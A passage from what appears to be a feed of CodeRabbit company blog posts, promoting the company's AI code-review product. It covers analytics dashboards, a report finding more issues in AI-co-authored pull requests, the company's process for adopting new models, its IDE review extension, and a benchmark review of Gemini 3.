charts on the right side of the dashboard let you track whether these metrics are improving or regressing. ## Organizational Trends: The macro view ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ebe96a9c6128c2808eab73fad6d9bc8d82eb94b171bfe043a963749e4e242f56_ada9e22b90.jpg) The Organizational Trends tab shows patterns over time. **Weekly Pull Requests:** Created and Merged PRs plots your team's throughput. In the screenshot, both created and merged PRs trend downward from mid-November toward December. This could reflect end-of-year slowdown, a shift in project priorities, or an emerging backlog. **Weekly Active Users:** Is where you look for engagement. The chart shows fluctuation between weekly active users, with a dip around late October. **Weekly Pipeline Failures:** Here you can track CI/CD health. Here the decrease in CodeRabbit users correlates with additional pipeline failures. **Most Active PR Authors and Reviewers:** Here’s where you can identify contribution patterns. In this data, multiple authors are tied for first place on both creating and reviewing PRs. This could indicate that these engineers are all at risk of being overwhelmed which could lead to a backlog. ## Data Metrics: The audit trail ![](https://victorious-bubble-f69a016683.media.strapiapp.com/df1b9a73c3464d049485c8a3a0758ad4b9b19e9936ac8ca2e88e2d59b3f4c67c_69bdf527a0.jpg) The Data Metrics tab provides per-user and per-PR detail for teams that need auditability, coaching insights, or root cause analysis. **Active User Details table:** This shows each developer's activity including PRs created and merged, time to last commit, total comments posted, and acceptance rates broken down by severity. You can see at a glance who is shipping frequently, who has long review cycles, and whose code generates more critical feedback. **Pull Request Details table:** This looks at individual PRs with info about their repository, author, creation time, first human review time, merge time, estimated complexity, reviewer count, and comment breakdown. For any PR that took unusually long or generated unusual feedback patterns, you can dig into the specifics. **Tool Finding Details table:** Here you’ll find a list of every static analysis finding by tool, category, severity, and count. This is useful for identifying which rules generate the most noise and which surface the most value. ## Why this data matters more now We are in a transition period for software development. AI is generating more code than ever. Developers are reviewing code they did not write. Engineering managers are being asked to prove that AI investments are paying off. The organizations that navigate this transition well will be the ones with visibility into their own processes. Not just "are we using AI," but "is AI helping us ship better software faster." CodeRabbit is one of the few tools positioned to answer that question. We see the code. We see the reviews. We see what ships. And now, with these dashboards, engineering leaders can see it too. The dashboards are available now for all CodeRabbit users. Filter by repository, user, team, or timeframe to analyze performance in the context that matters most to your organization. If you are an engineering leader trying to measure AI impact, this is where you start. Curious? Try CodeRabbit today with a [14-day free trial.](https://coderabbit.link/WfD06kP)

Our new report: AI code creates 1.7x more problems

David Loker — Wed, 17 Dec 2025 00:00:00 GMT

*What we learned from analyzing hundreds of open-source pull requests.* Over the past year, AI coding assistants have gone from emerging tools to everyday fixtures in the development workflow. At many organizations, a part of every code change is now machine-generated or machine-assisted. But while this has been accelerating the speed of development, questions have been quietly circulating: * Why are more defects slipping through into staging? * Why do certain logic or configuration issues keep appearing? * And are these patterns tied to AI-generated code? It would appear like AI is playing a significant role. [A recent report](https://go.cortex.io/rs/563-WJM-722/images/2026-Benchmark-Report.pdf?version=0) found that while pull requests per author increased by 20% year-over-year, thanks to help from AI, incidents per pull request increased by 23.5%. This year also brought several high-visibility incidents, postmortems, and anecdotal stories pointing to AI-written changes as a contributing factor. These weren’t fringe cases or misuses. They involved otherwise normal pull requests that simply embedded subtle mistakes. And yet, despite rapid adoption of AI coding tools, there has been surprisingly little concrete data about how AI-authored PRs differ in quality from human-written ones. So, CodeRabbit set out to answer that question empirically in our [**State of AI vs Human Code Generation Report.**](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) ## Our State of AI vs Human Code Generation Report We analyzed **470 open-source GitHub pull requests**, including **320 AI-co-authored PRs** and **150 human-only PRs**, using CodeRabbit’s structured issue taxonomy. Every finding was normalized to issues per 100 PRs and we used statistical rate ratios to compare how often different types of problems appeared in each group. The results? Clear, measurable, and consistent with what many developers have been feeling intuitively: **AI accelerates output, but it also amplifies certain categories of mistakes.** [READ THE FULL REPORT](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) ### Limitations of our study Getting data on issues that are more prevalent in AI-authored PRs is critical for engineering teams but the challenge was determining which PRs were AI-authored vs human authored. Since it was impossible to directly confirm authorship of each PR of a large enough OSS dataset, we checked for signals that a PR was co-authored by AI and assumed that those that didn’t have it were human authored, for the purposes of the study. This resulted in statistically significant differences in issue patterns between the two datasets, which we are sharing in this study so teams can better know what to look for. However, we cannot guarantee all the PRs we labelled as human authored were actually authored only by humans. Our full methodology is shared at the end of the report. # **Top 10 findings from the report** No issue category was uniquely AI but most categories saw significantly more errors in AI-authored PRs. That means, humans and AI make the same kinds of mistakes. AI just makes many of them more often and at a larger scale. ### **1\. AI-generated PRs contained ~1.7× more issues overall.** Across 470 PRs, AI-authored changes produced **10.83 issues per PR**, compared to **6.45** for human-only PRs. Even more striking: high-issue outliers were much more common in AI PRs, creating heavy review workloads. ### **2\. Severity escalates with AI: More critical and major issues.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/c28bcb0762a2fc229e40ffe36e124e39b022beffde7a14f35cd90d4e445403d5_d7452fe252.png) AI PRs show ~**1.4–1.7×** more critical and major findings. ### **3\. Logic and correctness issues were 75% more common in AI PRs.** These include business logic mistakes, incorrect dependencies, flawed control flow, and misconfigurations. Logic errors are among the most expensive to fix and most likely to cause downstream incidents. ### **4\. Readability issues spiked more than 3× in AI contributions.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/4c6617439329bf7ed3f384075dc2714b43a94f446d4847af36202bb1ffa8dbed_8756f91833.png) The single biggest difference across the entire dataset was in readability. AI-produced code often looks consistent but violates local patterns around naming, clarity, and structure. ### **5\. Error handling and exception-path gaps were nearly 2× more common.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/27c568e33eaee6f41e29732d86a22b505da5c9bf5fdac083a4663bf0bda98618_f3c38337ec.png) AI-generated code often omits null checks, early returns, guardrails, and comprehensive exception logic, issues tightly tied to real-world outages. ### **6\. Security issues were up to 2.74× higher** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/88e2d93be61517e548912b6297d5147a352f277dfe63774e0f4c921f49f628d9_92343df4dc.png) The most prominent pattern involved improper password handling and insecure object references. While no vulnerability type was unique to AI, nearly all were amplified. ### **7\. Performance regressions, though small in number, skewed heavily toward AI.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8acef551fea32b1992399f1ec8c55f339362bc12b1ba29b6c483a11693313b66_bc9d338fcb.png) Excessive I/O operations were ~8× more common in AI-authored PRs. This reflects AI’s tendency to favor clarity and simple patterns over resource efficiency. ### **8\. Concurrency and dependency correctness saw ~2× increases.** Incorrect ordering, faulty dependency flow, or misuse of concurrency primitives appeared far more frequently in AI PRs. These were small mistakes with big implication ### **9\. Formatting problems were 2.66× more common in AI PRs.** Even teams with formatters and linters saw elevated noise: spacing, indentation, structural inconsistencies, and style drift were all more prevalent in AI-generated code. ### **10\. AI introduced nearly 2× more naming inconsistencies.** Unclear naming, mismatched terminology, and generic identifiers appeared frequently in AI-generated changes, increasing cognitive load for reviewers. [READ THE FULL REPORT](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) ## Why these patterns appear Why are teams seeing so many issues with AI-generated code? Here’s our analysis: * **AI lacks local business logic:** Models infer code patterns statistically, not semantically. Without strict constraints, they miss the rules of the system that senior engineers internalize. * **AI generates surface-level correctness:** It produces code that looks right but may skip control-flow protections or misuse dependency ordering. * **AI doesn’t adhere perfectly to repo idioms:** Naming patterns, architectural norms, and formatting conventions often drift toward generic defaults. * **Security patterns degrade without explicit prompts:** Unless guarded, models recreate legacy patterns or outdated practices found in older training data. * **AI favors clarity over efficiency:** Models often default to simple loops, repeated I/O, or unoptimized data structures. ## What engineering teams can do about it Adopting AI coding tools isn’t simply about speeding up development. It requires rethinking the guardrails that ensure all code entering production is safe, maintainable, and correct. Based on the patterns in the data, here are the most important takeaways for teams: ### **1\. Give AI the context it needs** AI makes more mistakes when it lacks business rules, configuration patterns, or architectural constraints. Provide prompt snippets, repo-specific instruction capsules, and configuration schemas to reduce misconfigurations and logic drift. ### **2\. Use policy-as-code to enforce style** Readability and formatting were some of the biggest gaps. CI-enforced formatters, linters, and style guides eliminate entire categories of AI-driven issues before review. ### **3\. Add correctness safety rails** Given the rise in logic and error-handling issues: * Require tests for non-trivial control flow * Mandate nullability/type assertions * Standardize exception-handling rules * Explicitly prompt for guardrails where needed ### **4\. Strengthen security defaults** Mitigate elevated vulnerability rates by centralizing credential handling, blocking ad-hoc password usage, and running SAST and security linters automatically. ### **5\. Nudge the model toward efficient patterns** Offer guidelines for batching I/O, choosing appropriate data structures, and using performance hints in prompts. ### **6\. Adopt AI-aware PR checklists** Reviewers should explicitly ask: * Are error paths covered? * Are concurrency primitives correct? * Are configuration values validated? * Are passwords handled via the approved helper? These questions target the areas where AI is most error-prone. ### 7\. Get help reviewing and testing AI code Code review pipelines weren’t created to handle the higher volume of code teams are currently shipping with the help of AI. Reviewer fatigue has been [found to lead to more issues and missed bugs](https://smartbear.com/resources/case-studies/cisco-systems-collaborator/). An AI code review tool like CodeRabbit helps by standardizing code reviews acts as a third-party source of truth that standardizes quality across different AI tools that teams might use while reducing the time and cognitive labor needed for reviews. That allows developers to concentrate on reviewing the more complex parts of the code changes and reduce the amount of bugs and issues that end up in production. [READ THE FULL REPORT](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) ## The bottom line AI coding tools are powerful accelerators, but acceleration without guardrails increases risk. [Our analysis](http://www.coderabbit.ai/whitepapers/state-of-AI-vs-human-code-generation-report) shows that AI-generated code is **consistently more variable**, **more error-prone**, and **more likely to introduce high-severity issues** without the right protections in place. The future of AI-assisted development isn’t about replacing developers. It’s about building systems, workflows, and safety layers that amplify what AI does well while compensating for what it tends to miss. For the teams that want the speed of AI without the surprises, the data is clear: **Quality isn’t automatic. It requires deliberate engineering. Even when using AI tools.** ***An AI code review tool could also help.*** [***Try CodeRabbit today.***](https://app.coderabbit.ai/login???free-trial)

Behind the curtain: What it really takes to bring a new model online at CodeRabbit

David Loker — Fri, 05 Dec 2025 00:00:00 GMT

***When we published*** [***our earlier article***](https://www.coderabbit.ai/blog/the-end-of-one-sized-fits-all-prompts-why-llm-models-are-no-longer-interchangeable?) ***on why users shouldn't choose their own models, we argued that model selection isn't a matter of preference, it's a systems problem. This post explains exactly why.*** Bringing a new model online at CodeRabbit isn't a matter of flipping a switch; it's a multi-phase, high-effort operation that demands precision, experimentation, and constant vigilance. Every few months, a new large-language model drops with headlines promising “next-level reasoning,” “longer context,” or “faster throughput.” For most developers, the temptation is simple: plug it in, flip the switch, and ride the wave of progress. We know that impulse. But for us, adopting a new model isn’t an act of curiosity, it’s a multi-week engineering campaign. Our customers don’t see that campaign, and ideally, they never should. The reason CodeRabbit feels seamless is precisely because we do the hard work behind the scenes evaluating, tuning, and validating every model before it touches a single production review. This is what it really looks like. ### **1\. The curiosity phase: Understanding the model’s DNA** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d06fc5fabdf2725ee9c698d8f7aaf140b3c2e681ecf963379082ba72a4b1c8d7_17e9180e2a.png) Every new model starts with a hypothesis. We begin by digging into what it claims to do differently: is it a reasoning model, a coding model, or something in between? What’s its architectural bias, its supposed improvements, and how might those capabilities map to our existing review system? We compare those traits against the many model types that power different layers of our context-engineering and review pipeline. The question we ask isn’t, “is this new model better?” but, *“where might it fit?”* Sometimes it’s a candidate for high-reasoning diff analysis; other times, for summarization or explanation work. Each of those domains has its own expectations for quality, consistency, and tone. From there, we start generating experiments. Not one or two, but dozens of evaluation configurations across parameters like temperature, context packing, and instruction phrasing. Each experiment feeds into our evaluation harness, which measures both quantitative and qualitative dimensions of review quality. ### **2\. The evaluation phase: Data over impressions** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/1bf0887623be9d6eb3a448cdc68ca647a1910e40b94384199d9c83d5d3acb11a_5254cfd783.png) This phase takes time. We run models across our internal evaluation set, collecting hard metrics that span coverage, precision, signal-to-noise, and latency. These are the same metrics that underpin the benchmarks we’ve discussed in earlier posts like [*Benchmarking GPT-5*](https://www.coderabbit.ai/blog/benchmarking-gpt-5-why-its-a-generational-leap-in-reasoning), [*Claude Sonnet 4.5: Better Performance, but a Paradox*](https://www.coderabbit.ai/blog/claude-sonnet-45-better-performance-but-a-paradox), [*GPT-5.1: Higher signal at lower volume*](https://www.coderabbit.ai/blog/gpt-51-for-code-related-tasks-higher-signal-at-lower-volume?), and [*Opus 4.5: Performs like the systems architect.*](https://www.coderabbit.ai/blog/opus-45-for-code-related-tasks-performs-like-the-systems-architect?) But numbers only tell part of the story. We also review the generated comments themselves by looking at reasoning traces, accuracy, and stylistic consistency against our current best-in-class reviewers. We use multiple LLM-judge recipes to analyze tone, clarity, and helpfulness, giving us an extra lens on subtle shifts that raw metrics can’t capture. If you’ve read our earlier blogs, you already know why this is necessary: models aren’t interchangeable. A prompt that performs beautifully on GPT-5 may completely derail on Sonnet 4.5. Each has its own “prompt physics.” Our job is to learn it quickly and then shape it to behave predictably inside our system. ## **3\. The adaptation phase: Taming the differences** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ebcd1df0a8ce0d3a41d0c97510acbb2f7e8af1230cb76003bb77b897d1d31995_94404a7d3a.png) Once we understand where a model shines and where it struggles, we begin tuning. Sometimes that means straightforward prompt adjustments such as fixing formatting drift or recalibrating verbosity. Other times, the work is more nuanced: identifying how the model’s internal voice has changed and nudging it back toward the concise, pragmatic tone our users expect. We don’t do this by guesswork. We’ll often use LLMs themselves to critique their own outputs. For example: “This comment came out too apologetic. Given the original prompt and reasoning trace, what would you change to achieve a more direct result?” This meta-loop helps us generate candidate prompt tweaks far faster than trial and error alone. During this period, we’re also in constant contact with model providers, sharing detailed feedback about edge-case behavior, bugs, or inconsistencies we uncover. Sometimes those conversations lead to model-level adjustments; other times they inform how we adapt our prompts around a model’s quirks. ## **4\. The rollout phase: From lab to live traffic** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/71957c5f42094a34a5dbe3805fedb45842d63ccf4f416074da31bd7a9dc619f3_c23a82a8fa.png) When a model starts to perform reliably in offline tests, we move into phased rollout. First, we test internally. Our own teams see the comments in live environments and provide qualitative feedback. Then, we open an early-access phase with a small cohort of external users. Finally, we expand gradually using a randomized gating mechanism so that traffic is distributed evenly across organization types, repo sizes, and PR complexity. Throughout this process, we monitor everything: * Comment quality and acceptance rates * Latency, error rates, and timeouts * Changes in developer sentiment or negative reactions to CodeRabbit comments * Precision shifts in suggestion acceptance If we see degradation in any of these signals, we roll back immediately or limit exposure while we triage. Sometimes it’s a small prompt-level regression; other times, it’s a subtle style drift that affects readability. Either way, we treat rollout as a living experiment, not a switch-flip. ## **5\. The steady-state phase: Continuous vigilance** Once a model is stable, the work doesn’t stop. We monitor it constantly through automated alerts and daily evaluation runs that detect regressions long before users do. We also listen, both to our own experience (we use CodeRabbit internally) and to customer feedback. That feedback loop keeps us grounded. If users report confusion, verbosity, or tonal mismatch, we investigate immediately. Every day, we manually review random comment samples from public repots that use us to ensure that quality hasn’t quietly slipped as the model evolves or traffic scales. ## **6\. Why we do all this & why you shouldn’t have to** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ec70ebd43bfc8237cc4b8cc23557a015848656517cbe1c82b421e177d2c6f70c_502418f0b3.png) Each new model we test forces us to rediscover what “good” means under new constraints. Every one comes with its own learning curve, its own failure modes, its own surprises. That’s the reality behind the promise of progress. Could an engineering team replicate this process themselves? Technically, yes. But it would mean building a full evaluation harness, collecting diverse PR datasets, writing and maintaining LLM-judge systems, defining a style rubric, tuning prompts, managing rollouts, and maintaining continuous regression checks. All of this before your first production review! That’s weeks of work just to reach baseline reliability. And you’d need to do it again every time a new model launches. We do this work so you don’t have to. Our goal isn’t to let you pick a model; it’s to make sure you never have to think about it. When you use CodeRabbit, you’re already getting the best available model for each task, tuned, tested, and proven under production conditions. Because “choosing your own model” sounds empowering until you realize it means inheriting all this complexity yourself. ## **Takeaway** Model adoption at CodeRabbit isn’t glamorous. It’s slow, meticulous, and deeply technical. But it’s also what makes our reviews consistent, trustworthy, and quietly invisible. Every diff you open, every comment you read, is backed by this machinery. Weeks of evaluation, thousands of metrics, and countless prompt refinements all in service of one thing: Delivering the best possible review, every time, without you needing to think about which model is behind it. Try out CodeRabbit today. [Get a free 14-day trial!](https://app.coderabbit.ai/login???free-trial)

It's harder to read code than to write it (especially when AI writes it)

Aleks Volochnev — Thu, 04 Dec 2025 00:00:00 GMT

*"Debugging is twice as hard as writing the code in the first place. Therefore, if you write the code as cleverly as possible, you are, by definition, not smart enough to debug it."* * Brian Kernighan (co-creator of Unix and co-author of *The C Programming Language*) I've been programming since I was ten. When it became a career, I got obsessed with code quality: clean code, design patterns, all that good stuff. My pull requests were polished like nobody's business: well-thought-out logic, proper error handling, comments, tests, documentation. Everything that makes reviewers nod approvingly. Then, LLMs came along and changed everything. I don't write that much code anymore since AI does it faster. Developer’s work now mainly consists of two parts: explaining to a model what you need, then verifying what it wrote, right? I’ve become more of a code architect and quality inspector rolled into one. And here came a problem I knew all too well from my years as a tech lead: ## **READING CODE IS ACTUALLY HARDER THAN WRITING IT.** As an open-source maintainer and senior developer, I had to review tons of other people's code, and I learned what Kernighan said the hard way. Reading unfamiliar code is exhausting. You have to reverse-engineer someone else's thought process, figure out why they made certain decisions, and consider edge cases they might have missed. With my own code, reviewing and adjusting were a no-brainer. I designed it, I wrote it, and the whole mental model was still fresh in my head. Now the code is coming from an LLM and suddenly reviewing "my own code" has become reviewing someone else's code. Except this "someone else" writes faster than I can think and doesn't take lunch breaks. AI is supposed to help, but if I want to ship production-grade software now, I actually have more hard work to do than before. The irony! And that’s why, for my first blog post since joining CodeRabbit, I wanted to focus on that fact. This is also, incidentally, why I decided to join CodeRabbit. But we’ll get to that part later. ## **We’re human (unfortunately for code quality)** Here's where things get uncomfortable: we're human beings, not code-reviewing machines. And human brains don't want to do hard work, thoroughly reviewing something that a) already runs fine, b) passes all the tests, and c) someone else will review anyway. It's so much easier to just git commit && git push and go grab that well-deserved coffee. Job is done! I went from “writing manually and shipping quality code,” to “generating code fast but shipping… bad code!” The quality dropped not because I had less time as I actually had MORE time since I wasn't typing everything myself. I just tend to “shorten” this verification phase, telling myself "it works, the tests pass, the team will catch anything major." ## **The problem with "Catching it in review"** At this point, I was already using CodeRabbit to review my team's pull requests (as an OSS-focused dev, I was an early adopter), and those reviews were genuinely helpful! CodeRabbit would catch things that slipped through. Security issues, edge cases, some logic bugs. Those problems that are easy to miss when you're moving fast. But here's the thing: those reviews were coming too late. The code was already pushed. Already in the repository, visible to the entire team. Sure, CodeRabbit would flag the issues and I'd fix them but not before my teammates had seen my AI-generated code with obvious problems that I didn't bother to review properly. That's not a great look when you've spent decades building a reputation for quality. ## **Enter: CodeRabbit in an IDE** Then, I discovered CodeRabbit had an IDE extension. The AI code reviewer I was already using for PRs could also review my code locally, before anything hits the repo. This was exactly what I needed. When I ask CodeRabbit to check or simply stage my changes, CodeRabbit reviews them right in VS Code, catching issues before git push. Now, my team sees only the polished version, just like the old days. Except now, I'm shipping AI-generated code at AI speeds. And I’m doing it with actual quality control. Automatic reviews mean no willpower required: I don't have to remember to run it, I don't have to open a separate tool. It just happens at commit time. Reviewing doesn't feel like plowing in the rain anymore. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/fef507493ad981dade7d84775035d329e65aced71a7d6feea1b2a0d8e126a955_29128522d4.png) This gets critical when you're looking at potential security headaches, like the one on the screenshot. CodeRabbit caught an access token leak that could've been a total disaster! Issues like this needs to be addressed *before* that code gets pushed to a repository. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ba3e3810050af63aa71a693b7f84aba07192e9b7b4412ce1e34556abb4a6ef98_a4754d2807.png) More than that, when it finds something, the fixes are committable. The tool doesn’t tell me to "go figure it out" but gives actual suggestions I can apply immediately, in one click. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3212882caf7ec4866957dcad2fdba201e22d8a7d25373f4cb331c60df70fe486_3d806c5351.png) For more advanced cases that can’t be resolved with a simple fix, CodeRabbit IDE extension writes a prompt that it sends to an AI agent of your choice. Fun fact: CodeRabbit is so good in writing prompts so I got a lot to learn from, improving my Prompt Engineering skills! ![](https://victorious-bubble-f69a016683.media.strapiapp.com/0d5ee85da24eb22abc0a511394ae7972550df2d01435577e4af25da22ca19092_19ac25ce2a.png) Even the free CodeRabbit IDE Review plan offers incredibly helpful feedback and catches numerous issues. However, the Pro plan unlocks its true power, providing the same comprehensive coverage you expect from regular CodeRabbit Pull Request reviews: tool runs, Code Graph analysis, and much more - there is a huge infrastructure behind every check! ![](https://victorious-bubble-f69a016683.media.strapiapp.com/7f7f3d3a14d84f1146fc53d54c6dc1e4155bbb04bc24ceeaad5a59443c38db38_740bfaa782.png) ## **The bottom line** Brian Kernighan was right: reading code is harder than writing it. That was true in 1974 and it's even more true now when AI can generate 300 lines while you're still thinking about a variable name. We thought AI would make our jobs easier. And it does… if you only count the writing. But the reading verifying, reviewing, and understanding what the AI agent actually built? That got harder. Many of us are doing 10x the volume at 10x the speed, which means 10x more code to read with the same human brain that gets lazy and wants coffee breaks. The solution isn't to slow down or go back to typing everything manually. The solution is to automate the code review process as thoroughly as we automated the code writing process. If your AI writes the code, another AI should be reading it before you get to it. The quality of the reviews is why I recently transitioned from being a CodeRabbit user to joining the team. And that’s why you should also try [CodeRabbit in your IDE](https://docs.coderabbit.ai/code-editors). The free tier means there's basically no excuse not to try it. Your reputation will thank you. ***Get started today with a*** [***14-day free trial!***](https://app.coderabbit.ai/login???free-trial)

Gemini 3 for code-related tasks: The dense engineer

David Loker — Wed, 26 Nov 2025 00:00:00 GMT

**TL;DR:** It doesn’t just write patches; it writes a complete argument for every change. When [Gemini 3](https://youtu.be/ou1sNnSeM4E?si=Nxi82RCQwwIZq9Vk) is right, it’s spectacularly right. When it’s wrong, it still sounds right. ### **Every model writes in our house style. Gemini 3 rewrites the rules.** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/f220ace5650161185e6e7437d028f19e0b9587db9a278fd9902605300beafb0f_f37708dd0e.png) All of CodeRabbit’s models follow the same structural blueprint: a short headline, an explanation, and a patch. However, Gemini 3 uses that frame differently. It fills every inch of space with evidence, preconditions, and causal reasoning. Each review reads like a technical brief wrapped around a diff. %[https://youtu.be/ou1sNnSeM4E?si=WRfez1XIkIJ8F955] Gemini 3 is confident, detailed, and relentlessly specific. Its comments read like they were written by a senior engineer who wants to fix the issue and demonstrate *why* the fix is necessary. That density is its defining trait. Every comment feels significant, even the ones you might not ultimately act on. ## **Benchmarking context for Gemini 3** ![Here is how CodeRabbit benchmarked Gemini 3](https://victorious-bubble-f69a016683.media.strapiapp.com/30edd8c05d1b83f5595a74a585d35a7d50f13bc9ecdcf36322670314d4bf6e36_0a5bb919e0.png) We evaluated Gemini 3 using CodeRabbit’s standard benchmark: 25 pull requests seeded with known error patterns (EPs) across C++, Java, Python, and TypeScript. Each comment was scored by multiple LLM judges and hand-validated by our engineers. We measured precision, important-share, and signal-to-noise ratio (SNR), the same metrics used in all of our model evaluations. We also assessed tone, length, and style, since how a model *communicates* can affect whether developers accept its suggestions. ![Gemini 3 vs GPT-5.1 and Opus 4.5 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/c18b66eeda50f25ef5bd4833b56d2cfef383f852ca34f2ea34d4098b36a30029_6858e50db6.png) **Interpretation:** Gemini 3 sits in the middle of the group for precision but provides excellent real-bug coverage. Roughly three of every four comments are important (critical or major). Its SNR of 3.2 puts it close to Opus 4.5 in reliability, but Gemini 3 expresses itself with greater conviction and detail. ### **Style and Tone of Gemini 3** ![Style and tone of Gemini 3 vs GPT-5.1 and Opus 4.5 and Sonnet 4.5](https://victorious-bubble-f69a016683.media.strapiapp.com/e70aff55d7108331f7fa97a97577f522cc98c6792b2c6aaff8a418bb4ff0fe1f_a31ce45961.png) **Tone summary:** Gemini 3 is the most assertive of the four. It communicates with confidence, and for the most part, that confidence is justified. Even when it makes a mistake, the comment sounds credible enough to make developers stop and re-check the code, which may add to its practical value but may be confusing for some. ![Gemini 3 Style and tone](https://victorious-bubble-f69a016683.media.strapiapp.com/c75c3614192783283fe4700ce8042d39776dd184d5a24cdfb64c8eb80f8b0554_3a274a46ff.png) ### **The dense engineer personality of Gemini 3** Gemini 3 compresses an exceptional amount of reasoning into compact comments. The average comment is only 16 lines long, yet each one unpacks a complete causal chain: *what broke, why it happened, and how to fix it.* For example, in a concurrency issue found in a C++ worker pool, Gemini 3 doesn’t simply say “missing lock.” It reconstructs the sequence: unlock, wait, missed signal, dead thread. Then it provides a single-line patch that resolves the race. In another TypeScript review, the model identifies that MAX\_SAFE\_INTEGER disables cache eviction, explains the performance risk, and proposes an LRU fallback. These are not stylistic suggestions. These are corrections that improve program reliability. This combination of density and accuracy defines Gemini 3’s personality. Every comment is an argument, and most of those arguments hold up under scrutiny. ### **What Gemini 3 feels like in review** ![Gemini 3 reviews](https://victorious-bubble-f69a016683.media.strapiapp.com/9b2eddfd78a4edf5e54b00f194a0665a13b4dbd80d24b5fe1f25aee7e8348f2c_cc42c65829.png) Reading Gemini 3 feels distinct from reading any other reviewer. It is confident and structured, but its reasoning is particularly dense. Each comment reads like a detailed technical review from a lead engineer who insists on context before approving a change. Comments often open with a directive such as “Fix this race condition,” then expand into a clear explanation, referencing specific files and ending with a patch. The result feels like an expert walking you through both the problem and the fix. Developers describe Gemini 3 as a reviewer that sounds sure of itself and provides evidence to support its claims. Its direct tone can feel intense, especially compared to GPT-5.1’s measured precision or Opus 4.5’s calm logic. However, each comment feels like a mini design review, explaining what to change, why it matters, and what trade-offs exist. The model’s high information density requires careful reading, but it provides proportionate insight. Even when wrong, Gemini 3 often reveals something valuable about hidden edge cases or architectural assumptions. ### **What the numbers show** **1\. Density correlates with correctness.** Longer comments (top half by length) pass more often, with 53% precision compared to 34% for shorter comments. Important comments (critical or major) average **847 characters**, nearly twice the size of unimportant ones (**442**). When Gemini 3 takes time to elaborate, it is typically accurate. **2\. Tone tracks severity.** Assertiveness rises with severity: **92%** of major and **67%** of critical comments are assertive, while only **36%** of minor comments are. Hedging increases to **36%** on minor issues. The model uses its strongest voice for the most serious problems, which makes it effective for triage. **3\. Confidence correlates with quality.** Assertive comments pass more frequently (**47.6%**) than neutral (**36%**) or hedged (**33%**) ones. Gemini 3’s confidence is generally supported by evidence rather than overstated. **4\. Patches indicate reliability.** When a diff or code block appears, the precision rate improves. Over **70%** of assertive comments contain diffs, compared with only **17%** of hedged comments. The presence of a patch often signals that the model’s reasoning is grounded in the actual code. ### **What it gets right** ![](https://victorious-bubble-f69a016683.media.strapiapp.com/a8435696083c8e6e6ed13236b8739b6c408ba1b505f689ed96a2fd45f9e356a4_57565c8244.png) Gemini 3’s strongest areas are concurrency and system correctness. It frequently detects interleaving and synchronization issues that other models overlook. It excels at diagnosing the *why* behind a bug: * **Thread-safety:** Describes lost wakeups and inconsistent locking with narrative precision, then offers a concise patch. * **Lifecycle management:** Identifies missing shutdown hooks or unclosed resources and recommends explicit cleanup. * **Algorithmic stability:** Corrects comparator logic and off-by-one ranges to restore invariants. * **System configuration:** Finds default values that disable expected behavior and recommends practical limits. Each of these shows how Gemini 3’s detailed reasoning leads to direct, verifiable fixes. ### **When it overreaches** Gemini 3’s conviction can occasionally go too far. On stylistic or low-severity issues, it may overstate importance. Some comments labeled “Critical” are actually minor or aesthetic. Its assertive tone can make small findings sound urgent. This model performs best when paired with experienced reviewers who can distinguish critical bugs from overconfident advice. Even its overreaches tend to highlight genuine inefficiencies or readability concerns. Few comments are without value. ### **Why density matters** Gemini 3 trades brevity for understanding. It does not simply provide a fix; it delivers a short investigation. This depth makes it particularly valuable for large, complex systems. Precision measures whether a model hits the target, but density measures how much a developer learns by reading it. In production environments, that difference matters. A concise reviewer like GPT-5.1 delivers quick, targeted notes. Gemini 3, by contrast, provides comprehensive reasoning that increases confidence and reduces the likelihood of missing subtle defects. Let's put it this way, *“You don’t skim Gemini 3. You study it.”* ### **Practical guidance: When to use Gemini 3** | **Use it when...** | **Because...** | | --- | --- | | Concurrency-heavy or resource-sensitive code | It excels at identifying synchronization and lifecycle issues. | | Depth over brevity | Longer, more detailed comments correlate with accuracy. | | You need actionable patches | Around 65% of comments include ready-to-apply diffs. | | You can manage assertive tone | Its confidence is helpful but occasionally overstated. | | You are mentoring newer developers | Each comment serves as both a fix and an educational note. | Gemini 3 is not ideal for superficial or stylistic reviews. It is best used when precision, explanation, and insight are more important than speed. ### **Closing thoughts: The shape of Gemini 3’s reasoning** Gemini 3 does more than fix code; it presents a logical case for every fix. Each comment is a complete story of cause, effect, and resolution. When it is correct, it feels like reading a senior engineer’s deep-dive analysis. Even when it is wrong, it provides insight into how to think about the problem. **Takeaway**: If GPT-5.1 is the decisive teammate and Opus 4.5 the disciplined architect, Gemini 3 is the dense engineer who delivers a fully reasoned diff that is confident, comprehensive, and intent on proving its point. ***Want to try out CodeRabbit?*** [***Get at 14-day free trial!***](https://coderabbit.link/PZ2w3mZ)

How CodeRabbit's Agentic Code Validation helps with code reviews

Ewa Szyszka — Tue, 25 Nov 2025 00:00:00 GMT

